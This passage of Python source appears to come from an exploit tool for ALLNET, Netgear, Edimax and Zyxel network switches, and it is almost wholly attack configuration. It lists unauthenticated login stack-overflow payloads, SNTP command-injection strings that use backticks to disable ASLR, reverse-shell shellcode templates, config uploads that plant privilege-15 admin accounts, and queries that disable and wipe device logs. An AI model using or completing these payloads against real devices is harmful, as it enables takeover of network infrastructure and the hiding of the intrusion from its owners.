'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'log_settings_set_cmd':'&en=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&ta=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&ta=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',
'sys_timeSettings_set_cmd_enable':'&sn=1',
'sys_timeSettings_set_cmd_disable':'&sn=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'stack':False,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'ALLNET_JSON': {
'vendor': 'ALLNET GmbH Computersysteme',
'model':'ALL-SG82xx',
'uri':'https://www.allnet.de/',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':False,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_global',
'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_global',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format',
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT',
'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
'content_check':'2',
'vulnerable': True,
'safe': True
},
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_time',
'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_time',
'inject_uri':'/cgi/set.cgi?cmd=sys_time',
'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_time',
'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=0&dlsType=0&_de=1":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_time',
'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'&empty=1',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&target=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&target=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',
'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',
'sys_timeSettings_set_cmd_enable':'&sntp=1',
'sys_timeSettings_set_cmd_disable':'&sntp=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'ALLNET': {
'vendor': 'ALLNET GmbH Computersysteme',
'uri':'https://www.allnet.de/',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=4353',
'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_4364=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'httpuploadfirmware.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadfirmware.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'httpupload_runstart_cfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/tmp/startup-config',
'content_check':'/tmp/startup-config',
'vulnerable': True,
'safe': True
},
'version_upgrade.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
'uri':'/cgi-bin/version_upgrade.cgi',
'check_uri':'',
'content':'Firm Upgrade',
'content_check':'Firm Upgrade',
'vulnerable': True,
'safe': True
},
'factory_reset.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Reset device to factory default (PoC: Too dangerous to verify)',
'uri':'/cgi-bin/factory_reset.cgi',
'check_uri':'',
'content':'Too dangerous to verify',
'content_check':'dummy',
'vulnerable': True,
'safe': False
},
'sysinfo_config.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':False,
'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
'uri':'/cgi-bin/sysinfo_config.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'"/cgi-bin/change_mac_addr_set',
'vulnerable': True,
'safe': True
},
'change_mac_addr_set.cgi': {
'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/change_mac_addr_set.cgi',
'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'cmd=547',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':False,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':False,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'Netgear': {
'vendor': 'NETGEAR Inc.',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':True,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_settings',
'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_settings',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
'clean_logfile_query':'{"":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
'clean_logmem_query':'{"":{}}',
'vulnerable': False,
'safe': True
},
'verify': {
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': True
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'md5',
'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':True,
'log_settings_set':0x00,
'log_ramClear':0x00,
'log_fileClear':0x00,
'workaround':False,
'verify_uri':'',
'vulnerable': False,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',
'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',
'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',
'sys_timeSettings_set_SIGSEGV': True,
'sys_timeSntp_set':0x00,
'sys_timeSntpDel_set':0x00,
'sys_timeSettings_set':0x00,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'cgi':'set.cgi',
'START':0x00,
'STOP':0x00,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'workaround':False,
'vulnerable': False,
'safe': True
},
},
},
'Edimax': {
'vendor': 'EDIMAX Technology Co., Ltd.',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':False,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_global',
'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_global',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format',
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT',
'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
'content_check':'1',
'vulnerable': True,
'safe': True
},
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_time',
'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_time',
'inject_uri':'/cgi/set.cgi?cmd=sys_time',
'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_time',
'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_time',
'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'&empty=1',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&target=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&target=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',
'sys_timeSettings_set_cmd_enable':'&sntp=1',
'sys_timeSettings_set_cmd_disable':'&sntp=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'Zyxel': {
'vendor': 'Zyxel Communications Corp.',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'encode',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
